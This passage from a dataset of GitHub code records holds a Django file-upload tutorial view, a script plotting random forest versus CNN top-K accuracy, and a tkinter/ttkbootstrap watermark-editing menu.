ax.tick_params(direction='in',which='major', length=10, bottom=True, top=True, left=True, right=True)\r\n ax.set_xlim(-5, 5)\r\n ax.set_ylim(-5, 5)\r\n\r\nplt.show()","repo_name":"Sntz91/dqn_multistep_experiments","sub_path":"visualizations/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12121880955","text":"from django.shortcuts import redirect, render,HttpResponse\nfrom django import forms\nimport os\nfrom django.conf import settings\n\nfrom app.utils.bootstrap import BootStrapForm,BootStrapModelForm\nfrom app import models\n\n# 文件组件 UpFrom\nclass UpForm(BootStrapForm):\n bootstrap_exclude_fields = [\"img\"] # 排除img字段 form-control 格式\n name = forms.CharField(label=\"姓名\")\n age = forms.CharField(label=\"年龄\")\n img = forms.FileField(label=\"头像\")\n\n# 文件上传(UpForm)\ndef upload_form(request):\n title = \"上传组件 UpFrom\"\n if request.method == \"GET\":\n form = UpForm()\n return render(request,'file/upload_form.html',{\"form\": form, \"title\": title})\n form = UpForm(data=request.POST, files=request.FILES)\n if form.is_valid():\n img_object = form.cleaned_data.get(\"img\")\n media_path = os.path.join(\"media\",img_object.name)\n f = open(media_path,mode='wb')\n for chunk in img_object.chunks():\n f.write(chunk)\n f.close()\n models.Employee.objects.create(\n name = form.cleaned_data[\"name\"],\n age = form.cleaned_data[\"age\"],\n img = media_path\n )\n return HttpResponse(\"...\")\n return render(request,'file/upload_form.html',{\"form\": form, \"title\": title})\n\n# 文件组件 ModelForm\nclass UpModelForm(BootStrapModelForm):\n bootstrap_exclude_fields = ['img','photo']\n class Meta:\n model = models.Employee\n fields = \"__all__\"\n\n# 文件上传 (ModalForm)\ndef upload_modelform(request):\n title = \"上传组件 UpModelForm\"\n if request.method == \"GET\":\n form = UpModelForm()\n return render(request,'file/upload_modelform.html',{\"form\":form, \"title\": title})\n form = UpModelForm(data=request.POST, files=request.FILES)\n if form.is_valid():\n form.save()\n return redirect(\"/file/upload/employee/\")\n return render(request, 'file/upload_employee.html', {\"form\": form, \"title\":title})\n\n# Employee 上传文件列表\ndef upload_employee(request):\n queryset = models.Employee.objects.all()\n\n return render(request,'file/upload_employee.html',{\"queryset\": queryset})\n\n\n# 文件上传\ndef upload_list(request):\n if request.method == \"GET\":\n return render(request,'file/upload_list.html')\n \n file_object = request.FILES.get(\"avatar\")\n # print(file_object.name) # 文件名\n\n # 写入文件\n f = open(file_object.name,mode='wb')\n for chunk in file_object.chunks():\n f.write(chunk)\n f.close\n\n return HttpResponse(\"...\")\n\n","repo_name":"houxiaoqiu/django","sub_path":"djsite/app/views/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2610113667","text":"import argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nimport pdb\nimport os\n\nimport utils\n\ndef get_argparser():\n\t\n\tparser = argparse.ArgumentParser()\n\n\t### CNNs\n\tparser.add_argument(\"--units\", \n\t\tdefault=16,\n\t\ttype=int,\n\t\thelp=\"Number of units in hidden layers of the DNN\")\n\tparser.add_argument(\"--layers\", \n\t\tdefault=2,\n\t\ttype=int,\n\t\thelp=\"Number of layers in the DNN\")\n\tparser.add_argument(\"--reg\", 
\n\t\tdefault=0.1,\n\t\ttype=float,\n\t\thelp=\"Regularization weight of the DNN\")\n\n\tparser.add_argument(\"--data_type\", \n\t\tdefault='rgb',\n\t\ttype=str,\n\t\thelp=\"Which data to evaluate on: (ir, rgb, cover)\")\n\n\treturn parser\n\ndef mixed_inputs():\n\n\tmodel_names = ['mixedinput', 'mixedlayer']\n\tplot_obj = np.zeros((2, 2))\n\tplot_i = 0\n\n\tfor model_name in model_names:\n\n\t\tloss_obj = np.loadtxt(f'output-data/train-history-{model_name}.csv', delimiter=',')\n\n\t\tprint(f'For model {model_name} Best train accuracy is {np.max(loss_obj[2])}')\n\t\tprint(f'For model {model_name} Best val accuracy is {np.max(loss_obj[3])}')\n\n\t\tplot_obj[plot_i, 0] = np.max(loss_obj[2])\n\t\tplot_obj[plot_i, 1] = np.max(loss_obj[3])\n\n\t\tplot_i += 1\n\n\tfig, ax = plt.subplots(1, 1, figsize=(6, 5))\n\n\twidth = 0.25\n\n\tax.set_title(f'Combined CNN Performance', fontsize=24)\n\tax.set_ylim([0, 1.05])\n\tax.bar(np.arange(2) - width / 2, plot_obj[:, 0], width, label='Training')\n\tax.bar(np.arange(2) + width / 2, plot_obj[:, 1], width, label='Validation')\n\n\tax.set_axisbelow(True)\n\tax.set_yticks(np.arange(0, 1.05, 0.1))\n\tax.grid(True, which='major', axis='y', linestyle = '--')\n\tax.legend(loc='best', fontsize=20)\n\n\tax.set_xticks(np.arange(2))\n\tax.set_xticklabels(['Mixed-input', 'Mixed-layer'], fontsize=16)\n\tax.set_ylabel('Accuracy', fontsize=20)\n\n\tfig.tight_layout(rect=[0, 0, 1, 1])\n\n\tplt.savefig(f'plot-combined.pdf')\n\ndef final_cdf():\n\n\trf_val_proba = np.load(f'RF7-valproba-simple.npy')\n\trf_test_proba = np.load(f'RF7-testproba-simple.npy')\n\trf_val = np.load(f'RF7-yval-simple.npy')\n\trf_test = np.load(f'RF7-ytest-simple.npy')\n\n\tcnn_val_proba = np.load(f'CNN10-valproba-rgb.npy')\n\tcnn_test_proba = np.load(f'CNN10-testproba-rgb.npy')\n\tcnn_val_cat = np.load(f'CNN10-yval-rgb.npy')\n\tcnn_test_cat = np.load(f'CNN10-ytest-rgb.npy')\n\tcnn_val = np.argmax(cnn_val_cat, axis=1)\n\tcnn_test = np.argmax(cnn_test_cat, axis=1)\n\n\trf_val_ranks = np.zeros(len(rf_val_proba))\n\tcnn_val_ranks = np.zeros(len(cnn_val_proba))\n\trf_test_ranks = np.zeros(len(rf_test_proba))\n\tcnn_test_ranks = np.zeros(len(cnn_test_proba))\n\n\tfor i in range(len(rf_val_proba)):\n\t\trf_val_ranks[i] = utils.scores_to_rank(rf_val_proba[i], rf_val[i])\n\t\tcnn_val_ranks[i] = utils.scores_to_rank(cnn_val_proba[i], cnn_val[i])\n\n\tfor i in range(len(rf_test_proba)):\n\t\trf_test_ranks[i] = utils.scores_to_rank(rf_test_proba[i], rf_test[i])\n\t\tcnn_test_ranks[i] = utils.scores_to_rank(cnn_test_proba[i], cnn_test[i])\n\n\tn_classes = 10\n\tcdf_val_rf = utils.plot_cdf(rf_val_ranks, max_rank=n_classes)\n\tcdf_val_cnn = utils.plot_cdf(cnn_val_ranks, max_rank=n_classes)\n\n\tcdf_test_rf = utils.plot_cdf(rf_test_ranks, max_rank=n_classes)\n\tcdf_test_cnn = utils.plot_cdf(cnn_test_ranks, max_rank=n_classes)\n\n\tfig, ax = plt.subplots(1, 1, figsize=(8, 6))\n\n\tax.plot(np.arange(1, n_classes + 1), cdf_test_rf, lw=2, label='Random Forest')\n\tax.plot(np.arange(1, n_classes + 1), cdf_test_cnn, lw=2, label='CNN')\n\tax.plot(np.arange(1, n_classes+1), np.arange(1, n_classes+1) / n_classes, color='black', linestyle='--', lw=2, label='Baseline')\n\n\tax.set_xticks(np.arange(n_classes + 1))\n\tax.legend(fontsize=20)\n\n\tax.set_ylim([0, 1.05])\n\tax.set_yticks(np.arange(0, 1.05, 0.1))\n\tax.set_axisbelow(True)\n\tax.grid(True, which='major', axis='y', linestyle = '--')\n\n\tax.set_ylabel('Top-K accuracy', fontsize=20)\n\tax.set_xlabel('K (number of output classes)', 
fontsize=20)\n\n\tfig.tight_layout()\n\tplt.savefig(f'final_cdf.pdf')\n\tplt.close()\n\n\tprint('RF')\n\tprint(cdf_test_rf)\n\t\n\tprint('CNN10')\n\tprint(cdf_test_cnn)\n\n\treturn\n\nif __name__ == '__main__':\n\t\n\tparser = get_argparser()\n\targs = parser.parse_args()\n\n\tfinal_cdf()\n","repo_name":"clementfung/biodiversity-analyzer","sub_path":"plot_combined.py","file_name":"plot_combined.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30854694025","text":"from tkinter import Button, Image, END\nimport tkinter as tk\nimport ttkbootstrap\nfrom ttkbootstrap.constants import *\nimport PIL\nfrom PIL import ImageTk, Image, ImageDraw, ImageFont\nimport os\nimport pandas as pd\nimport re\n\nCOLORS_FP = \"assets/colors/rgb_colors.csv\"\ndf = pd.read_csv(COLORS_FP)\nCOLOR_LIST = df['hex'].values.tolist()\nALL_COLOR = df.to_dict('records')\n\nFONT_FAMILIES = [\n {'font_name': 'Arial', 'path': 'assets/fonts/Arial.ttf'},\n {'font_name': 'Degreco', 'path': 'assets/fonts/degreco-condensed-regular.otf'},\n {'font_name': 'Eagle Lake', 'path': 'assets/fonts/EagleLake-Regular.ttf'},\n {'font_name': 'IBM Plex Mono', 'path': 'assets/fonts/IBMPlexMono-Regular.ttf'},\n {'font_name': 'Jacques Francois', 'path': 'assets/fonts/JacquesFrancois-Regular.ttf'},\n {'font_name': 'Quando', 'path': 'assets/fonts/Quando-Regular.ttf'},\n {'font_name': 'Racing Sans One', 'path': 'assets/fonts/RacingSansOne-Regular.ttf'},\n {'font_name': 'Sacramento', 'path': 'assets/fonts/Sacramento-Regular.ttf'},\n {'font_name': 'Sail', 'path': 'assets/fonts/Sail-Regular.ttf'},\n {'font_name': 'Trade Winds', 'path': 'assets/fonts/TradeWinds-Regular.ttf'},\n {'font_name': 'Verdana', 'path': 'assets/fonts/verdana.ttf'},\n {'font_name': 'ZCOOL KuaiLe', 'path': 'assets/fonts/ZCOOLKuaiLe-Regular.ttf'},\n ]\nOPEN_COLSE_BTN_IMG = [\n 'assets/icons/up-arrow.png',\n 'assets/icons/right-arrow.png'\n ]\nPOSITIONS = ['Top Center', 'Top Left', 'Top Right', 'Middle Center', 'Middle Left', 'Middle right', 'Bottom Center', 'Bottom Left', 'Bottom Right']\n\n\nclass AddTextMenu(ttkbootstrap.Frame):\n def __init__(self, win, watermark, photo_box):\n self.watermark = watermark \n self.photo_box = photo_box\n \n super().__init__(win)\n self.sub_win = ttkbootstrap.Toplevel() \n self.sub_win.title('Properties')\n self.sub_win.geometry(f'420x700+1000+140')\n\n self.text_entry = TextEntry(self.sub_win, self.on_text_change)\n self.text_entry.grid(row=2, column=0, padx=15, pady=(15,5), sticky=NSEW)\n\n self.font_widget = FontWidget(self.sub_win, self.on_font_change)\n self.font_widget.grid(row=3, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.color_widget = ColorWidget4(self.sub_win, self.on_color_change)\n self.color_widget.grid(row=4, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.size_widget = SizeWidget(self.sub_win, self.on_size_change)\n self.size_widget.grid(row=5, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.opacity_widget = OpacityWidget(self.sub_win, self.on_opacity_change)\n self.opacity_widget.grid(row=6, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.position_widget = PositionWidget(self.sub_win, self.watermark, self.on_position_set, self.on_position_change)\n self.position_widget.grid(row=7, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.rotation_widget = RotationWidget2(self.sub_win, self.on_rotation_change)\n self.rotation_widget.grid(row=8, column=0, padx=15, pady=5, sticky=NSEW)\n\n self.copy_save_widget = 
ClearSaveWidget(self.sub_win, self.clear, self.save)\n self.copy_save_widget.grid(row=9, column=0, padx=15, pady=(35,15))\n\n def on_text_change(self, sv):\n self.watermark.text = sv.get()\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_font_change(self, font):\n self.font_widget.show_font_effect.configure(image=font['photo'])\n self.font_widget.show_font_name.configure(text=font['font_name'])\n self.watermark.change_font(font)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n self.font_widget.toggle_open_close()\n\n def on_color_change(self, color):\n self.color_widget.show_color_hex.configure(text=color, background=color)\n self.watermark.change_color(color)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n self.color_widget.toggle_open_close()\n\n def on_size_change(self, event):\n self.watermark.change_size(event, self.size_widget.selected_size.get())\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_opacity_change(self, event):\n self.watermark.change_opacity(event, self.opacity_widget.slider.get())\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_position_set(self):\n selected_pos = self.position_widget.var_radio.get()\n self.watermark.selected_pos = selected_pos\n watermark_xy = self.watermark.get_position(self.photo_box.im_width, self.photo_box.im_height, self.photo_box.text_w, self.photo_box.text_h)\n self.watermark.x = watermark_xy[0]\n self.watermark.y = watermark_xy[1]\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_position_change(self, direction):\n print(self.watermark.x, self.watermark.y)\n new_xy = self.watermark.move(direction)\n self.watermark.x = new_xy[0]\n self.watermark.y = new_xy[1]\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def on_rotation_change(self, event, var_scale): # Scale version\n self.watermark.rotate(event, var_scale)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def clear(self):\n self.photo_box.remove()\n self.text_entry.sv.set(self.watermark.text)\n self.text_entry.ent.focus()\n self.opacity_widget.slider.set(self.watermark.opacity)\n self.on_font_change([font for font in FONT_FAMILIES if font['font_name']==self.watermark.font['font_name']][0])\n self.font_widget.toggle_open_close()\n self.on_color_change(self.watermark.color)\n self.color_widget.toggle_open_close()\n self.size_widget.selected_size.set(self.watermark.font_size)\n self.rotation_widget.slider.set(self.watermark.rotation)\n self.photo_box.update_watermark(self.watermark.x, self.watermark.y)\n\n def save(self):\n self.photo_box.save()\n\n# ==============================================================\nclass TextEntry(ttkbootstrap.Frame):\n def __init__(self, win, on_text_change):\n super().__init__(win)\n ttkbootstrap.Label(self, text='Text:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n self.sv = ttkbootstrap.StringVar()\n self.sv.set('Your Text')\n self.sv.trace('w', lambda name, index, mode, sv=self.sv: on_text_change(sv))\n self.ent = ttkbootstrap.Entry(self, textvariable=self.sv, width=32)\n self.ent.focus()\n self.ent.grid(row=0, column=1)\n\nclass FontWidget(ttkbootstrap.Frame):\n def __init__(self, win, on_font_change, **kwargs):\n super().__init__(win, **kwargs)\n self.columnconfigure(0, weight=1)\n self.cumulative_rows = 0\n\n self.base_frm = ttkbootstrap.Frame(self) \n self.base_frm.grid(row=0, column=0, sticky=NSEW)\n \n self.up_arrow_img 
= ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[0])\n        self.right_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[1])\n\n        ttkbootstrap.Label(self.base_frm, text='Font: ', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        frm = ttkbootstrap.Frame(self.base_frm, width=26)\n        frm.grid(row=0, column=1, sticky=EW)\n        self.show_font_effect = ttkbootstrap.Label(frm, text='') \n        self.show_font_effect.grid(row=0, column=0)\n        self.show_font_name = ttkbootstrap.Label(frm, text='', width=23, anchor=CENTER) \n        self.show_font_name.grid(row=0, column=1, padx=(1,2))\n        self.btn = Button(frm, text='', image=self.right_arrow_img, width=20, command=self.toggle_open_close) \n        self.btn.grid(row=0, column=2, sticky=E)\n\n        self.canvas = ttkbootstrap.Canvas(self.base_frm, highlightthickness=0) \n        self.scrollbar = ttkbootstrap.Scrollbar(self.base_frm, orient=tk.VERTICAL, command=self.canvas.yview) \n        self.canvas.configure(yscrollcommand=self.scrollbar.set)\n\n        self.font_families = FONT_FAMILIES\n\n        self.style = ttkbootstrap.Style()\n        self.font_group = ttkbootstrap.Frame(self, padding=(20,5,0,0))\n        # keep the canvas scrollregion in sync whenever the inner frame is resized\n        self.font_group.bind('<Configure>', lambda e:self.canvas.configure(scrollregion=self.canvas.bbox('all')))\n        self.canvas.create_window((0,0), window=self.font_group, anchor=NW)\n\n        for num, font in enumerate(self.font_families):\n            width, height = (60, 60)\n            text_1 = 'Ag'\n            d_font_1 = ImageFont.truetype(font['path'], size=26)\n            d_fill = (77, 77, 77)\n\n            # RGB channels run 0-255, so white is (255, 255, 255)\n            font_txt = Image.new('RGB', (width, height), (255, 255, 255))\n            d = ImageDraw.Draw(font_txt)\n            _, _, w, h = d.textbbox((0, 0), text=text_1, font=d_font_1) \n            d.text(xy=((width-w)/2, (height-h)/2), text=text_1, font=d_font_1, fill=d_fill) \n\n            font_photo = ImageTk.PhotoImage(font_txt)\n            font['photo'] = font_photo \n            font_btn = Button(self.font_group, image=font_photo, command=lambda font=font: on_font_change(font)) \n            font_btn.grid(row=int(num/5)+1, column=num%5, padx=1, pady=1, sticky=W) \n\n        self.show_font_effect.configure(image=self.font_families[0]['photo'])\n        self.show_font_name.configure(text=self.font_families[0]['font_name'])\n\n    def toggle_open_close(self):\n        if self.font_group.winfo_viewable():\n            self.canvas.grid_remove()\n            self.scrollbar.grid_remove()\n            self.btn.configure(image=self.right_arrow_img)\n        else:\n            self.canvas.grid(row=1, column=0, columnspan=4, padx=0, sticky=EW) \n            self.scrollbar.grid(row=1, column=3, padx=0, sticky=NS+W) \n            self.btn.configure(image=self.up_arrow_img)\n\n\n# class ColorWidget1(ttkbootstrap.Frame): # Combobox version\n#     def __init__(self, win, on_color_change):\n#         super().__init__(win)\n#         self.color_list = [\"black\", \"white\", \"blue\", \"yellow\", \"green\", \"red\", \"purple\", \"orange\", \"brown\"]\n#         self.selected_color = ttkbootstrap.StringVar()\n#         self.selected_color.set(self.color_list[0])\n#         ttkbootstrap.Label(self, text='Color:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n#         self.cob = ttkbootstrap.Combobox(self, textvariable=self.selected_color, values=self.color_list, state='readonly', width=20)\n#         self.cob.current(0)\n#         self.cob.bind('<<ComboboxSelected>>', on_color_change)\n#         self.cob.grid(row=0, column=1)\n\n#     def get_value(self):\n#         return self.cob.get()\n# class ColorWidget2(ttkbootstrap.Frame): # Listbox version:https://www.plus2net.com/python/tkinter-colors.php\n#     def __init__(self, win, on_color_change):\n#         super().__init__(win)\n\n#         self.selected_color = ttkbootstrap.StringVar()\n#         ttkbootstrap.Label(self, text='Color:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n\n#         self.entry = 
ttkbootstrap.Entry(self, textvariable=self.selected_color, width=21)\n# self.entry.grid(row=0, column=1)\n# self.list_box = tk.Listbox(self, relief='flat', bg='SystemButtonFace',highlightcolor= 'SystemButtonFace', width=22, height=3)\n \n# self.list_box.bind('<>', on_color_change) \n# self.selection = 0\n# self.entry.bind('', self.move_down)\n# self.list_box.bind('', self.move_up)\n# self.list_box.bind('', self.on_return)\n# self.selected_color.trace('w', self.get_data) \n\n# def get_data(self, *args):\n# search_str = self.entry.get()\n# if search_str != '':\n# self.list_box.grid(row=2, column=1)\n# self.list_box.delete(0, END)\n# for color in COLOR_LIST:\n# if(re.match(search_str, color, re.IGNORECASE)):\n# self.list_box.insert(END, color)\n# if self.list_box.size() > 0:\n# self.should_able_arrow_keys = True\n# print(f'should_able_arrow_keys: {self.should_able_arrow_keys}')\n \n# def move_down(self, event):\n# self.list_box.focus()\n# if self.selection < (self.list_box.size() - 1):\n# self.list_box.select_clear(self.selection)\n# self.selection += 1\n# self.list_box.select_set(self.selection)\n\n# def move_up(self, event):\n# if self.selection > 0:\n# self.list_box.select_clear(self.selection)\n# self.selection -= 1\n# self.list_box.select_set(self.selection)\n\n# def on_return(self, event):\n# self.list_box.select_set(self.selection)\n# class ColorWidget3(ttkbootstrap.Frame): # Button version with showing all contents\n# \"\"\"折叠收缩格式的菜单\"\"\"\n# def __init__(self, win, on_color_change, **kwargs):\n# super().__init__(win, **kwargs)\n# self.columnconfigure(0, weight=1)\n# self.cumulative_rows = 0\n\n# # widget images\n# self.images = OPEN_COLSE_BTN_IMG\n\n# self.style = ttkbootstrap.Style()\n# self.color_group = ttkbootstrap.Frame(self, padding=(0,5,0,0))\n# for num, color in enumerate(COLOR_LIST):\n# self.style.configure(f'{color}.TButton', background=color, width=1)\n# color_btn = ttkbootstrap.Button(self.color_group, style=f'{color}.TButton', bootstyle='light-link', command=lambda color=color: on_color_change(color))\n# color_btn.grid(row=int(num/11)+1, column=num%11, padx=1,pady=1)\n \n# self.add(child=self.color_group)\n\n# def add(self, child, title=\"Color: \", initial_collapsed=True, **kwargs):\n# if child.winfo_class() != 'TFrame':\n# return\n# frm = ttkbootstrap.Frame(self)\n# frm.grid(row=self.cumulative_rows, column=0, sticky=NSEW)\n\n# ttkbootstrap.Label(frm, text=title, font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n# show_color_hex = ttkbootstrap.Label(frm, text='hex: ', foreground='gray', width=26)\n# show_color_hex.grid(row=0, column=1, padx=(0,5))\n\n# def _func(c=child): return self._toggle_open_close(c)\n# btn = ttkbootstrap.Button(frm, text='Hide', width=4, command=_func) \n# btn.grid(row=0, column=2)\n \n# child.lb = show_color_hex\n# child.btn = btn\n# child.grid(row=self.cumulative_rows + 1, column=0, sticky=NSEW)\n \n# if initial_collapsed:\n# child.grid_remove()\n# child.btn.configure(text='Show')\n# self.cumulative_rows += 2\n\n# def _toggle_open_close(self, child):\n# if child.winfo_viewable():\n# child.grid_remove()\n# child.btn.configure(text='Show')\n# else:\n# child.grid()\n# child.btn.configure(text='Hide')\nclass ColorWidget4(ttkbootstrap.Frame): # Canvas vs Scrollbar + Button version. 
This one is perfect\n    def __init__(self, win, on_color_change, **kwargs): # on_color_change,\n        super().__init__(win, **kwargs)\n        self.columnconfigure(0, weight=1)\n        self.cumulative_rows = 0\n\n        self.color_families = COLOR_LIST\n\n        self.up_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[0])\n        self.right_arrow_img = ttkbootstrap.PhotoImage(file=OPEN_COLSE_BTN_IMG[1])\n\n        self.base_frm = ttkbootstrap.Frame(self) # color widget base frame\n        self.base_frm.grid(row=0, column=0, sticky=NSEW)\n\n        ttkbootstrap.Label(self.base_frm, text='Color: ', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        frm = ttkbootstrap.Frame(self.base_frm)\n        frm.grid(row=0, column=1, sticky=NSEW)\n\n        self.show_color_hex = ttkbootstrap.Label(frm, text='hex: ', foreground='gray', background=self.color_families[0], width=30)\n        self.show_color_hex.grid(row=0, column=1, padx=(0,5), sticky=EW)\n        self.btn = Button(frm, text='', width=20, image=self.right_arrow_img, command=self.toggle_open_close) #, text='Show',image=self.images[1]\n        self.btn.grid(row=0, column=2, sticky=NSEW)\n\n        self.canvas = ttkbootstrap.Canvas(self.base_frm)\n        self.scrollbar = ttkbootstrap.Scrollbar(self.base_frm, orient=tk.VERTICAL, command=self.canvas.yview)\n        self.canvas.configure(yscrollcommand=self.scrollbar.set)\n\n        self.style = ttkbootstrap.Style()\n        self.color_group = ttkbootstrap.Frame(self.canvas, padding=(20,5,0,0))\n        # keep the canvas scrollregion in sync whenever the inner frame is resized\n        self.color_group.bind('<Configure>', lambda e:self.canvas.configure(scrollregion=self.canvas.bbox('all')))\n        self.canvas.create_window((0,0), window=self.color_group, anchor=NW)\n\n        for num, color in enumerate(self.color_families):\n            self.style.configure(f'{color}.TButton', background=color, width=1)\n            color_btn = ttkbootstrap.Button(self.color_group, style=f'{color}.TButton', bootstyle='light-link', command=lambda color=color: on_color_change(color))\n            color_btn.grid(row=int(num/10)+1, column=num%10, padx=1, pady=1)\n\n    def toggle_open_close(self):\n        if self.color_group.winfo_viewable():\n            self.canvas.grid_remove()\n            self.scrollbar.grid_remove()\n            self.btn.configure(image=self.right_arrow_img)\n        else:\n            self.canvas.grid(row=1, column=0, columnspan=3, sticky=EW)\n            self.scrollbar.grid(row=1, column=3, sticky=NS)\n            self.btn.configure(image=self.up_arrow_img)\n\nclass SizeWidget(ttkbootstrap.Frame):\n    def __init__(self, win, on_size_change):\n        super().__init__(win)\n        ttkbootstrap.Label(self, text='Size:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        self.selected_size = ttkbootstrap.IntVar()\n        self.selected_size.set(50)\n        self.scale = ttkbootstrap.Scale(self, variable=self.selected_size, from_=10, to_=200, length=260, command=lambda s:self.selected_size.set(\"%d\" % float(s)))\n        self.scale.grid(row=0, column=2)\n        lb = ttkbootstrap.Label(self, textvariable=self.selected_size, width=4)\n        lb.grid(row=0, column=1)\n        # apply the new size once the slider is released\n        self.scale.bind('<ButtonRelease-1>', on_size_change)\n\nclass OpacityWidget(ttkbootstrap.Frame):\n    def __init__(self, win, on_opacity_change):\n        super().__init__(win)\n        ttkbootstrap.Label(self, text='Opacity:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        self.slider = ttkbootstrap.IntVar()\n        self.slider.set(255)\n        self.scale = ttkbootstrap.Scale(self, variable=self.slider, from_=0, to_=255, length=260, command=lambda s:self.slider.set(\"%d\" % float(s)))\n        self.scale.grid(row=0, column=2)\n        lb = ttkbootstrap.Label(self, textvariable=self.slider, width=4)\n        lb.grid(row=0, column=1)\n        # apply the new opacity once the slider is released\n        self.scale.bind('<ButtonRelease-1>', on_opacity_change)\n\nclass PositionWidget(ttkbootstrap.Frame):\n    def __init__(self, win, watermark, 
on_position_set, on_position_change):\n        super().__init__(win)\n        self.watermark = watermark\n\n        ttkbootstrap.Label(self, text='Position:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        frm = ttkbootstrap.Frame(self)\n        frm.grid(row=0, column=1, sticky=NSEW)\n\n        sub_frm1 = ttkbootstrap.Frame(frm)\n        sub_frm1.grid(row=0, column=0, pady=5)\n\n        self.var_radio = ttkbootstrap.StringVar(value=self.watermark.selected_pos)\n        for num, pos in enumerate(self.watermark.positions):\n            self.radio_btn = ttkbootstrap.Radiobutton(sub_frm1, text=pos, value=pos, bootstyle='danger', variable=self.var_radio, command=on_position_set)\n            self.radio_btn.grid(row=num+1, column=0, pady=2, sticky=W)\n\n        sub_frm2 = ttkbootstrap.Frame(frm)\n        sub_frm2.grid(row=0, column=1, padx=80, sticky=E)\n        direction_btns = [\n            {'text': '▲', 'direction': 'up', 'row': 0, 'col':1},\n            {'text': '◀', 'direction': 'left', 'row': 1, 'col':0},\n            {'text': '▶', 'direction': 'right', 'row': 1, 'col':2},\n            {'text': '▼', 'direction': 'down', 'row': 2, 'col':1},\n            ]\n        for btn in direction_btns:\n            self.btn = ttkbootstrap.Button(sub_frm2, text=btn['text'], width=1, bootstyle='second-outline', command=lambda dir=btn['direction']: on_position_change(dir))\n            self.btn.grid(row=btn['row'], column=btn['col'], padx=2, pady=2)\n\n# class RotationWidget1(ttkbootstrap.Frame): # changing by click button\n#     \"\"\"\n#     AddTextMenu:\n#         self.rotation_widget = RotationWidget(self.sub_win, self.on_rotation_change)\n\n#     Call Function:\n#         def on_rotation_change(self, direction):\n#             self.watermark.rotate(direction)\n#             self.photo_box.update_watermark()\n\n#     Watermark:\n#         def rotate(self, direction):\n#             if direction == \"left\":\n#                 if self.rotation == 355:\n#                     self.rotation = 0\n#                 else:\n#                     self.rotation += 5\n#             else:\n#                 if self.rotation == 0:\n#                     self.rotation = 355\n#                 else:\n#                     self.rotation -= 5\n\n#         print(self.rotation)\n#     \"\"\"\n#     def __init__(self, win, on_rotation_change):\n#         super().__init__(win)\n#         ttkbootstrap.Label(self, text='Rotation', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n#         frm = ttkbootstrap.Frame(self)\n#         frm.grid(row=0, column=1, padx=100, sticky=NSEW)\n#         buttons = [\n#             {'text': '↺', 'direction': 'left', 'row':0, 'col':1, 'padx': (0,17)},\n#             {'text': '↻', 'direction': 'right', 'row':0, 'col':3, 'padx': (16,0)},\n#             ]\n#         for btn in buttons:\n#             self.btn = ttkbootstrap.Button(frm, text=btn['text'], width=1, command=lambda dir=btn['direction']: on_rotation_change(dir))\n#             self.btn.grid(row=btn['row'], column=btn['col'], padx=btn['padx'], sticky=NSEW)\nclass RotationWidget2(ttkbootstrap.Frame): # Changing via a scale\n    def __init__(self, win, on_rotation_change):\n        super().__init__(win)\n        ttkbootstrap.Label(self, text='Rotation:', font=('', 12, 'bold'), width=8).grid(row=0, column=0)\n        self.slider = ttkbootstrap.IntVar()\n        self.slider.set(0)\n\n        self.scale = ttkbootstrap.Scale(self, variable=self.slider, from_=-355, to_=355, length=210, command=lambda s:self.slider.set('%d' % float(s)))\n        self.scale.grid(row=0, column=2)\n\n        self.lb = ttkbootstrap.Label(self, textvariable=self.slider, width=4)\n        self.lb.grid(row=0, column=1)\n        # apply the rotation once the slider is released\n        self.scale.bind('<ButtonRelease-1>', lambda event: on_rotation_change(event, self.slider.get()))\n\n        self.btn = ttkbootstrap.Button(self, text='Reset', bootstyle='second-outline', command=lambda s=0:self.slider.set(0))\n        self.btn.grid(row=0, column=3)\n        self.btn.bind('<Button-1>', lambda event: on_rotation_change(event, 0))\n\n\nclass ClearSaveWidget(ttkbootstrap.Frame):\n    def __init__(self, win, clear, save):\n        
self.clear_btn = ttkbootstrap.Button(self, text='Clear', bootstyle=SECONDARY, width=8, command=clear)\n        self.clear_btn.grid(row=0, column=0, padx=(0,50), sticky=NSEW)\n\n        self.save = ttkbootstrap.Button(self, text='Save', bootstyle=SUCCESS, width=8 , command=save)\n        self.save.grid(row=0, column=2, padx=(50,0), sticky=NSEW)\n\n\n\nif __name__ == \"__main__\":\n    print(COLOR_LIST)","repo_name":"Zoe-Soen/watermark_ver1","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":23499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
